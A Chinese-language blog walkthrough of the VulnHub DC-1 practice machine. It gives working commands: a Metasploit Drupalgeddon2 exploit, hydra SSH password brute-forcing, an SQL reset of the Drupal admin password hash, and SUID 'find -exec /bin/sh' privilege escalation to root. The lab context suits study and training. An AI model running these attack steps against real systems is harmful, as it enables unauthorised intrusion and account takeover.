靶机DC-1

最新推荐文章于 2024-06-04 16:20:34 发布
最新推荐文章于 2024-06-04 16:20:34 发布
阅读量413 收藏 2
点赞数
文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847235/article/details/103074706
版权

靶机:DC-1

靶机介绍

vulnhub

环境

攻击机器:debian kali发行版

使用工具

  • arp-scan
  • metasploit
  • hydra
  • john the ripper

开始测试

打开靶机。
因为靶机与攻击机在同一网络内,所以使用kali上的arp-scan进行扫描。

测试一下发现192.168.56.101就是靶机的ip。

访问该ip,

看到页面上有"Drupal Site"的字样,应该是一个cms,所以使用metasploit查找一下

root@n4tsu:~# msfconsole
msf > search Drupal

选择日期最近而且rank为excellent的exp。

msf > use exploit/unix/webapp/drupal_drupalgeddon2

然后查看参数

msf > show options

只有RHOST即目标机器是需要设定的。

msf > set RHOST 192.168.56.101

然后发动攻击

msf > exploit


可以看到成功进入。

使用metasploit自带的shell:

meterpreter > shell

看到目录下有一个__flag1.txt__

所以

cat flag1.txt

查看:

提示查看cms的配置文件

drupal的配置文件在/sites/default/settings.php

cat /sites/default/settings.php

得到了__flag2__和数据库的用户名和密码!

尝试连接数据库,但是提示www-data用户权限不够。

尝试查看/etc/shadow,权限也不够:

于是这里需要提权。

无法查看shadow的话,查看一下/etc/passwd:

得到了flag4用户的用户名。

这里就可以使用hydra+john进行暴力破解。

root@n4tsu:~# hydra -l flag4 -P /usr/share/john/password.lst ssh://192.168.56.101

得到flag4用户的密码为orange

于是可以通过ssh远程连接。

在该用户目录下发现__flag4.txt__:

提示root目录里有一个flag。

连接数据库:

成功。

show databases;


use drupaldb
show tables;


SELECT * FROM users;

经百度,
这里用户的密码采用的加密方式为sha-512,试了下解密,解不出来,于是想到直接重置密码。

靶机/scripts/目录下自带了一个名叫password-hash.sh的进行加密的脚本

php /scripts/password-hash.sh n4tsu >233.txt
cat 233.txt

然后进入mysql,更新admin的密码为刚刚得到的。

UPDATE users SET pass="$S$DNYMGrrGNXbaOhWM45gvpJLRAZovLBCThL6oSAKc31Aw1nl4mxp6" WHERE name="admin";

成功。

接着使用用户名admin,密码n4tsu登陆进网站:

翻了一下找到一个__flag3__的界面:

…提到了find指令和shadow文件,应该是要使用find命令来提权,然后去查看/etc/shadow文件。

如何提权呢?提示了find命令的话,可以先查看一下具有suid权限位的文件

find / -type f -perm -u=s 2>/dev/null

注: -type f即文件,-perm -u=s 即user权限位为suid

可以看到find命令具有suid权限位,可以拿来提权。

先创建一个文件

touch getflag

然后查看下find命令的权限

find / -type f -name getflag -exec "whoami" \;

输出root

接着提权:

find / -type f -name getflag -exec "/bin/sh" \;

成功,查看最后一个flag:

至此,5个flag全部拿到。

输出root

接着提权:

find / -type f -name getflag -exec "/bin/sh" \;

[外链图片转存中…(img-ZQXGI06Z-1573735505356)]

成功,查看最后一个flag:

[外链图片转存中…(img-qurO029y-1573735505356)]

至此,5个flag全部拿到。

Summ4r
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机DC-1
cyzCc的博客
02-15 907
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
DC系列靶机1通关教程_dc1 靶机,2024年最新我了解到的面试的一些小内幕
2401_83947105的博客
04-15 672
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。网络管理:可以查看网络接口、扫描主机、进行端口转发等操作。权限提升:可尝试获取更高的权限,如提升到管理员或SYSTEM权限。
【渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell
最新发布
m0_74313947的博客
06-04 1178
靶机下载地址靶机界面渗透测试流程:1.范围界定2. 信息搜集3. 目标识别4. 服务枚举5. 漏洞映射6. 社会工程学7. 漏洞利用8. 权限提升9. 访问维护0. 文档报告。
DC-1靶机提权root
真正的大师,永远都怀着一颗学徒的心。
07-21 720
文章目录前言一、查看当前权限二、suid提权总结 前言 提示:上一篇介绍了怎么反弹shell,点这里可以查看,本篇文章将介绍怎么提权到root用户 一、查看当前权限 1)反弹shell后我们首先要做的事就是查看当前用户的权限。 2)输入该命令来得到交互的Shell,一般的系统都默认安装python python -c ‘import pty;pty.spawn("/bin/bash")’ 3) 我们当前的用户权限由于不是root,所以很多文件看不了,因此我们要进行提权操作 二、suid提权 1)
vulnhub靶场:DC-1 思路详解
weixin_62369433的博客
09-24 474
快速入门学习vulnhub靶场
DC:1靶机
黑锤的博客
11-25 410
这个靶机有五个flag,适合初学者,我没管那么多,反正直接拿到root权限就可以了。 下载地址自己去Google吧。 环境搭建好之后,第一步还是老样子,主机发现:netdiscover -r 192.168.233.0/24 得到主机的ip为192.168.233.144 进一步用nmap扫一遍,在扫的同时可以访问他的ip去看看。nmap -sS -A 192.168.233.0/24 看到...
DC-1靶机攻略
weixin_47311099的博客
04-02 434
DC-1攻略 信息收集 探测目标主机ip地址 使用nmap进行探测 nmap -sP 192.168.64.0/24 -oN nmapsP.txt 得出目标主机IP是192.168.64.135 探测目标ip开放的端口 同样使用nmap探测 nmap -A 192.168.64.135 -p 1-65535 -oN nmapA.txt 发现开放22ssh和80http 看到22想到? 爆破 看到80想到? 先访问看看 访问80端口 发现drupal字样 三大开源cms:drupal、wordp
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
靶机渗透DC-1
weixin_44801963的博客
09-21 1922
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码
靶机实战-DC-1
滕财然的博客
01-30 926
DC-1靶机实战 文章目录DC-1靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口 1、主机发现 优点是快,但不能跨网段 2、端口扫描 3、端口详细信息扫描 4、访问80端口 发现网站使用Drupal cms管理系统而且是drupal 7 用msf去找drupal 7的漏洞利用: 使用最新的漏洞尝试攻击 拿到shell//先看权限,权限不够就提权 使用python...
VulnHub----DC1靶场记录
x1871329637的博客
04-26 3200
00-环境介绍 靶机下载地址:DC: 1 ~ VulnHub 攻击机:kali2022:192.168.200.129 DC1:192.168.200.135 目标:拿到5个flag 1由于这是一次黑盒测试所以只能根据目标mac地址来确认靶机的ip信息 由此判定靶机ip为192.168.200.135 2nmap直接扫 nmap -A 192.168.200.135 -p 1-65535 由此可见开放了22 80 111 42892端口,可以先去访问一下80端口 .
DC-1入门练习
Mr_helloword的博客
07-10 839
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
DC靶机渗透系列(DC1-DC3)
居上
07-01 701
收获 DC1 回顾了metasploit的一些用法 利用已知cms的exp来getshell hashcat爆破用法 find提权 DC2 cewl根据网页内容生成字典 wpscan结合cewl跑账号和密码 用metasploit的模块来ssh爆破 rbash->bash--------vim逃逸 git提权 DC3 searchsploit的一些用法 在github上搜罗cms探测脚本 john爆破用法 页面模板里添加一句话木马 使用Python开启SimpleHTTPServer 公开的
vulnhub DC-1 靶机
FourthGuy的博客
05-03 582
打开我们的kali linux 和 DC-1 靶机 信息收集 扫描靶机ip: arp-scan -l 查看网段的所有主机 由上图得到DC-1靶机ip为192.168.88.129 nmap端口扫描:接下来就要用我们的神器nmap了 (端口:如果我们把ip看成是一个房子,端口就是门,我们需要通过端口来从ip这里获取,传输数据) ...
kali渗透之DC-1
余笙.'的博客
11-21 1031
kali渗透DC-1靶机
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值